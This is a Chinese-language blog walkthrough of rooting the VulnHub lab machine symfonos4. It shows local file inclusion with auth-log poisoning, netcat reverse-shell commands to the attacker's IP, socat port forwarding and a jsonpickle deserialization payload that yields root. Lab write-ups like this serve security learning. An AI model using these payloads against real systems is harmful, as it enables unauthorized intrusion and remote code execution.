symfonos4 靶机

symfonos4 (Linux)靶机
https://www.vulnhub.com/entry/symfonos-4,347/


目标
-得到root

*如果要下载来玩建议不要看, 因为剧透了

1. 打开你的Kali和靶机(symfonos4)

 2. 使用netdiscover扫描靶机.

 3. 使用Zenmap扫描靶机看有什么服务端口.

4. 因为有开放端口80 http Apache服务所以一定有网站. 礼貌看看.

5. 我使用dirb跑了一下没发现网址,那么我们就用dirbuster来跑一下.

6. 有两个网页被扫出来/sea.php和/atlantis.php.

7. 先看看http://192.168.1.136/atlantis.php是一个登入界面.

8. 使用命令‘or ‘1’=’1’看下有没有 SQL inject漏洞.

9. 发现没有SQL inject漏洞.

10. 再看看http://192.168.1.136/sea.php.

11. 随便选择一个发现它是php?file=hades那么应该可以Php inject.
 12. 经过摸索, 找到了Login记录.

13. 那么试一试SSH登入看看, 并不需要真的登入.

14. 然后查看一下有没有我们刚刚的登入记录.
http://192.168.1.136/sea.php?file=../../../../../../var/log/auth&c=id

15. 确定可以使用php inject后, 打开netcat监听.

16. 使用php inject指令来反弹Shell
192.168.1.136/sea.php?file=../../../../../../var/log/auth&c=nc%20192.168.1.230%206666%20-e%20/bin/bash

17. 得到Shell.

18. 然后交换Shell
python -c 'import pty; pty.spawn("/bin/bash")'

19. 进行了普通的检测发现没有什么能用的而且这个用户没有root权限,使用命令#ss -l看看有什么服务运行着.

20. 发现还有一个网页而且是侦听着localhost上的.

21. 那么用socat把它转去其它端口这里我把它转去8888端口.

22. 然后在浏览器输入192.168.1.136:8888就可以了, 他会自动导到whoami网页.
那么我看到有Cookie应该是要用BurpSuite来抓资料看看了,但还是点Main page看看.

23. 嗯,是没有的. 
那么打开Burp Suite,然后回去192.168.1.136:8888/whoami

24. 果然我们看到有一个经过加密的username.

25. 使用Burp Suite的 Decoder 来解发现是Base64格式加密.

26. 上网查看了一下发现这个语言叫sonpickle Exploitation, 可以修改一下来运行Netcat命令反弹Shell.
那么上面是明文我们的code然后Encode去Base64.
{"py/object":"__main__.Shell","py/reduce":[{"py/function":"os.system"},["/usr/bin/nc -e /bin/sh 192.168.1.230 6666"], 0, 0, 0]}
https://versprite.com/blog/application-security/into-the-jar-jsonpickle-exploitation/

27. Kali打开监听.

28. 复制我们的Base64命令去username=后面, 然后Forward.
29. 成功连接.

30. 使用#id查看一下, 得到root.



31. 那么直接打开root下的文件, 完成.


感谢阅读

No comments:

Post a Comment